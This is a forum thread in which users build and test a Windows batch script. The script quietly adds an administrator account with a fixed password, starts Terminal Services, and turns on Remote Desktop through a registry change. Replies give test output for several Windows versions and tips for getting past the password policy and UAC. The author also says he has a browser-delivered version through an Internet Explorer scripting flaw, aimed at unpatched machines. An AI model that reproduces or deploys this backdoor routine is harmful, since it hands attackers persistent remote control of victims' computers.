digip Posted January 25, 2010 Share Posted January 25, 2010 I have tested this in Windows XP Pro and it works fine. It will not work in Home editions(obviously, no RDP settings, only remote assistance). What I would like someone to do, is maybe try it on Server 2003, Vista and Windows 7(Above home edition, needs RDP cababilities), as I do not have anything above Home edition for Vista/7 and dont have Server 2003 installed anywhere at the moment. ::: Tested to work on Windows XP Pro, ::: Will not work on Home edition (There is no TermServices for RDP, only Remote Assistance) ::: Might possibly work in Server 2003, but have not tried it yet. ::: Adds a user "stupid" with password "password" ::: Enables TermService and Remote Control (RDP) - DigiP :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: @echo off net user stupid password /add && net localgroup Administrators stupid /add SC config "TermService" start= "auto" NET START "Terminal Services" REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F Due to the forums wrapping text, the last two lines of code should be one line, space between /v and fDeny Quote Link to comment Share on other sites More sharing options...
Seph Posted January 25, 2010 Share Posted January 25, 2010 Sure np man. Give us a few EDIT: K. Ran through it with 2003 server and Win7. Though admittedly I didn't actually run the batch file on my actual win7 machine =P 2003 - Fine, worked perfectly. Win7 - Going to assume it works fine. I walked through each command, looked like it would work fine. As well as the reg entry. (lol at the user and pass btw) Quote Link to comment Share on other sites More sharing options...
digip Posted January 25, 2010 Author Share Posted January 25, 2010 In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, whats your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are are pretty much the same under the hood aside from the servers services and admin pack. On a side note, I have this working as a sploit in Internet Explorer, using a wscript hosting flaw. On my system it prompts me if I want to run it(which of course I wouldn't other than for debugging and testing my own machine), but I'm sure there are some people out there with default installs of XP and IE with unpatched machines and even low IE security settings for Active-X and scripting. If those damn spyware apps can get in, then so will this. Its basically the same as the bat commands, just written for VBScript in the browser (and it does work in XP, and most likely Server 2003 now that you have confirmed it for me). Quote Link to comment Share on other sites More sharing options...
MRGRIM Posted January 25, 2010 Share Posted January 25, 2010 Pretty neat script, I remember the first time I ever had to use the remote registry feature on a Server to edit the fDenyTSConnections, I tell you nothing is more fun than running "Shutdown" commands from a server command prompt Quote Link to comment Share on other sites More sharing options...
Charles Posted January 25, 2010 Share Posted January 25, 2010 Did you need someone to try it out on Server 2008? Quote Link to comment Share on other sites More sharing options...
digip Posted January 25, 2010 Author Share Posted January 25, 2010 Did you need someone to try it out on Server 2008? Sure, if you want, cause apparently this flaw for IE effects XP, Server2003, Vista and 7, although I wasnt able to get it to work on my wifes 7 box, I may have it locked down too tight to get in, cause I dont even get the prompt in IE8 to run the code, nor does it create any users on her system. Quote Link to comment Share on other sites More sharing options...
Charles Posted January 25, 2010 Share Posted January 25, 2010 Sure, if you want, cause apparently this flaw for IE effects XP, Server2003, Vista and 7, although I wasnt able to get it to work on my wifes 7 box, I may have it locked down too tight to get in, cause I dont even get the prompt in IE8 to run the code, nor does it create any users on her system. I'll give it a shot when I get home tonight and post the results. I wonder if it would work on my 7 box since I haven't exactly locked anything down. Quote Link to comment Share on other sites More sharing options...
digip Posted January 25, 2010 Author Share Posted January 25, 2010 I wonder if it would work on my 7 box since I haven't exactly locked anything down. If its home edition, wont work for RDP, but should for adding a user and term service. Quote Link to comment Share on other sites More sharing options...
Charles Posted January 25, 2010 Share Posted January 25, 2010 Heh. I'm running Win 7 Ultimate (like an idiot, cuz I hardly use RDP, but I like having my local users and group applet... ) I'll probably install a copy of 7 and Vista in a VM and see what happens. To do list: Install Server 2008, 7, Vista and run script. Man I love VirtualBox. B) Quote Link to comment Share on other sites More sharing options...
555 Posted January 25, 2010 Share Posted January 25, 2010 So a batch file is pretty much just CMD commands listed in a certain way to preform what you want right? I found this site pretty cool for learning advanced windows cmd commands http://blog.commandlinekungfu.com/ to be honest I have not made a batch file since before windows existed and it was only DOS, or when the first windows came out up to my 386DX Quote Link to comment Share on other sites More sharing options...
Charles Posted January 26, 2010 Share Posted January 26, 2010 Ok here's the one for Windows Server 2008: C:\Users\Administrator\Documents>test.cmd The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. More help is available by typing NET HELPMSG 2245. [SC] ChangeServiceConfig SUCCESS The service name is invalid. More help is available by typing NET HELPMSG 2185. The operation completed successfully. C:\Users\Administrator\Documents> After disabling complexity requirements in GPO it worked, minus terminal services I think. C:\Users\Administrator\Documents>test.cmd The command completed successfully. The command completed successfully. [SC] ChangeServiceConfig SUCCESS The service name is invalid. More help is available by typing NET HELPMSG 2185. The operation completed successfully. C:\Users\Administrator\Documents> It did enable remote desktop, and you can login with "stupid//password" Next post will by for Vista. Quote Link to comment Share on other sites More sharing options...
Charles Posted January 26, 2010 Share Posted January 26, 2010 With UAC enabled: C:\Users\User\Documents>test System error 5 has occurred. Access is denied. [SC] OpenService FAILED 5: Access is denied. System error 5 has occurred. Access is denied. ERROR: Access is denied. C:\Users\User\Documents> With UAC disabled: C:\Users\User\Documents>test.cmd The command completed successfully. The command completed successfully. [SC] ChangeServiceConfig SUCCESS The requested service has already been started. More help is available by typing NET HELPMSG 2182. The operation completed successfully. C:\Users\User\Documents> Quote Link to comment Share on other sites More sharing options...
digip Posted January 26, 2010 Author Share Posted January 26, 2010 The command completed successfully. The command completed successfully. [sC] ChangeServiceConfig SUCCESS The service name is invalid. It did enable remote desktop, and you can login with "stupid//password" In server 2008, can you open services.msc and scroll down for Terminal Services. or somethign similar, I need to know the actual name of the service description. It seems that it still uses sc TermService but the actual net command uses a different name to start the service, although it looks like your system already had it running since RDP was able to start. Quote Link to comment Share on other sites More sharing options...
Charles Posted January 26, 2010 Share Posted January 26, 2010 Windows 7: With UAC enabled: C:\Users\user\Documents>test.cmd System error 5 has occurred. Access is denied. [SC] OpenService FAILED 5: Access is denied. The service name is invalid. More help is available by typing NET HELPMSG 2185. ERROR: Access is denied. C:\Users\user\Documents> Without UAC enabled: C:\Users\user\Documents>test.cmd The command completed successfully. The command completed successfully. [SC] ChangeServiceConfig SUCCESS The service name is invalid. More help is available by typing NET HELPMSG 2185. The operation completed successfully. C:\Users\user\Documents> Quote Link to comment Share on other sites More sharing options...
Seph Posted January 26, 2010 Share Posted January 26, 2010 In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, whats your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are are pretty much the same under the hood aside from the servers services and admin pack. My ip is lol.lol.lol.XD and RDP port is open and forwarded. :P 2003 machine was a vbox testing server so i really didnt care. Like i said i didnt actually run the script on my host, i only check if your syntax was correct. Didnt actually add anything. Quote Link to comment Share on other sites More sharing options...
digip Posted January 26, 2010 Author Share Posted January 26, 2010 I wonder if vista and up dont let you disable Terminal Services, that it is always on other than sc TermService set to auto, disabled, etc. If thats the case, then for Vista, 7, and 2008, all I'll need to do is create the user and enable RDP. At least nothing gets broken in the process either, so I can just leave this as is for generic means. Quote Link to comment Share on other sites More sharing options...
Charles Posted January 26, 2010 Share Posted January 26, 2010 Ok. For windows 7: There is no Terminal Serves service. There is one that is called "remote desktop services." it's named "TermService" Got it to start by using this command: C:\Users\user\Documents>SC config TermService start= auto [SC] ChangeServiceConfig SUCCESS Windows Vista: There is a service named "Terminal Services" it is named "TermService" Same command got it running: SC config TermService start= auto Also for Vista and W7, UAC either needs to be disabled or you need to be in an admin command shell..err window... w/e. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.